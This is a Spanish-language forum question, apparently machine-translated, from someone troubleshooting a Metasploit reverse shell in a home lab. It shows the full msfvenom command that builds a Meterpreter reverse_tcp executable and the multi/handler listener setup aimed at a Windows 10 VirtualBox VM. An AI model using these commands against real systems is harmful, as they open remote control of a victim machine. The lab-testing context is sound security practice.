Estoy ejecutando metasploit en la ventana acoplable desde: remnux / metasploit y quiero abrir una shell inversa en una máquina virtual que ejecuta Windows 10 en el cuadro virtual. El contenedor de la ventana acoplable y la máquina virtual se ejecutan en la misma máquina host con ip: 192.168.10.1
Voy:
sudo docker run --rm -it -p 8080:8080 -v ~/.msf4:/root/.msf4 -v /tmp/msf:/tmp/data remnux/metasploit
Entonces:
msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86
LHOST=192.168.10.1 LPORT=8080 -f exe -o file.exe
Y encienda msfconsole:
msfconsole
msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LPORT 8080
LPORT => 8080
msf exploit(handler) > set LHOST 192.168.10.1
LHOST => 192.168.10.1
msf exploit(handler) > exploit
[-] Handler failed to bind to 192.168.10.1:8080:- -
[*] Started reverse TCP handler on 0.0.0.0:8080
[*] Starting the payload handler...
Finalmente abro file.exe en la máquina con Windows10 y no pasa nada. Verifiqué que el puerto 8080 estaba abierto en la máquina host y que la máquina virtual podría hacer ping a la máquina host en 192.168.10.1
Mi configuración de red de virtualbox está configurada como adaptador puenteado.
Además, no tengo ningún antivirus en ejecución en este vm y Windows Defender está inactivo.
¿Alguien tiene alguna idea de por qué esto no funciona? Gracias de antemano.